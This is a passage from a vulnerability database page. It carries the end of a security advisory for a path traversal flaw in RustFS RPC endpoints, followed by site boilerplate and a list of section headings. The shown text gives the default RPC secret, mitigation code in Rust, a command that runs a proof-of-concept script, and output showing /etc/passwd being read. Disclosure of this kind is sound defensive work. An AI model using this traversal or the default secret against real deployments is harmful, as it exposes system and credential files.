- System binaries (if permissions allow)\n\n### Availability Impact: MEDIUM\n\n- \u26a0\ufe0f `walk_dir` endpoint could enumerate entire filesystem\n- \u26a0\ufe0f Potential DoS via recursive directory traversal\n\n## Exploitation Requirements\n\n### Prerequisites\n\n1. **Network Access**: Ability to reach RustFS RPC endpoints\n2. **RPC Secret Knowledge**: Knowledge of RUSTFS_SECRET_KEY\n   - Default: `\"rustfs-default-secret\"`\n   - Production: From environment variable or config\n3. **Disk/Volume Knowledge**: Valid disk ID and volume name\n4. **File Size Knowledge**: Exact file sizes for successful reads\n\n### Attack Complexity\n\n- **Without Secret**: Impossible (signature verification)\n- **With Secret**: Trivial (automated script)\n- **With Default Secret**: Critical risk if not changed\n\n## Mitigation Recommendations\n\n### Immediate Actions (Priority 0)\n\n1. **Path Canonicalization**\n```rust\nasync fn read_file_stream(\u0026self, volume: \u0026str, path: \u0026str, ...) -\u003e Result\u003cFileReader\u003e {\n    let volume_dir = self.get_bucket_path(volume)?;\n\n    // CRITICAL FIX:\n    let file_path = volume_dir.join(Path::new(\u0026path));\n    let canonical = file_path.canonicalize()\n        .map_err(|_| DiskError::FileNotFound)?;\n\n    // Validate path is within volume_dir\n    if !canonical.starts_with(\u0026volume_dir) {\n        error!(\"Path traversal attempt detected: {:?}\", path);\n        return Err(DiskError::InvalidArgument);\n    }\n\n    // Continue with validated path...\n}\n```\n\n2. **Path Component Validation**\n```rust\n// Reject dangerous path components\nif path.contains(\"..\") || path.starts_with(\u0027/\u0027) {\n    return Err(DiskError::InvalidArgument);\n}\n```\n\n3. **Use path-clean Crate**\n```rust\nuse path_clean::PathClean;\n\nlet cleaned_path = PathBuf::from(\u0026path).clean();\nif cleaned_path.to_string_lossy().contains(\"..\") {\n    return Err(DiskError::InvalidArgument);\n}\n```\n\n### Additional Security Measures\n\n4. **Audit Logging**: Log all RPC file operations with full paths\n5. **Rate Limiting**: Prevent DoS via repeated RPC calls\n6. **Secret Rotation**: Ensure unique RPC secrets per deployment\n7. **Network Segmentation**: Restrict RPC endpoint access\n8. **Security Testing**: Add path traversal tests to test suite\n\n### Long-term Improvements\n\n9. **Chroot Jail**: Isolate RPC operations in chroot environment\n10. **Least Privilege**: Run RustFS with minimal file system permissions\n11. **Security Audit**: Comprehensive review of all file operations\n\n## Proof of Concept Script\n\nThe complete PoC is available at: `exploit_path_traversal.py`\n\n### Usage\n\n```bash\n# Ensure RustFS is running\ndocker compose ps\n\n# Run exploit\npython3 exploit_path_traversal.py\n```\n\n### Output\n\n```\n[+] SUCCESS! Read 751 bytes\n[+] File content:\n================================================================================\nroot:x:0:0:root:/root:/bin/sh\n[... full /etc/passwd content ...]\n================================================================================\n```\n\n## Acknowledgements\n\nRustFS would like to thank **bilisheep** from the **Xmirror Security Team** for discovering and responsibly reporting this vulnerability.\n\nAcknowledgements: RustFS would like to thank @realansgar and  **bilisheep** from the **Xmirror Security Team** for providing the security report.",
  "id": "GHSA-pq29-69jg-9mxc",
  "modified": "2026-01-07T21:34:33Z",
  "published": "2026-01-07T18:15:29Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/rustfs/rustfs/security/advisories/GHSA-pq29-69jg-9mxc"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68705"
    },
    {
      "type": "WEB",
      "url": "https://github.com/rustfs/rustfs/commit/ab752458ce431c6397175d167beee2ea00507d3e"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/rustfs/rustfs"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "RustFS Path Traversal Vulnerability"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2025-68705 (GCVE-0-2025-68705)

FKIE_CVE-2025-68705

GHSA-PQ29-69JG-9MXC

RustFS Path Traversal Vulnerability

Vulnerability Details

Vulnerable Code

Proof of Concept

Test Environment

Attack Scenario

Exploit Parameters

Required Authentication

Successful Exploits

1. Read /etc/passwd ✅

2. Read /etc/hosts ✅

3. Read /etc/hostname ✅

Technical Analysis

Data Flow

Path Traversal Mechanism

Why It Works

Special Considerations

Impact Assessment

Confidentiality Impact: HIGH

Integrity Impact: HIGH

Availability Impact: MEDIUM

Exploitation Requirements

Prerequisites

Attack Complexity

Mitigation Recommendations

Immediate Actions (Priority 0)

Additional Security Measures

Long-term Improvements

Proof of Concept Script

Usage

Output

Acknowledgements

Tags

Sightings

Nomenclature

1. Read `/etc/passwd` ✅

2. Read `/etc/hosts` ✅

3. Read `/etc/hostname` ✅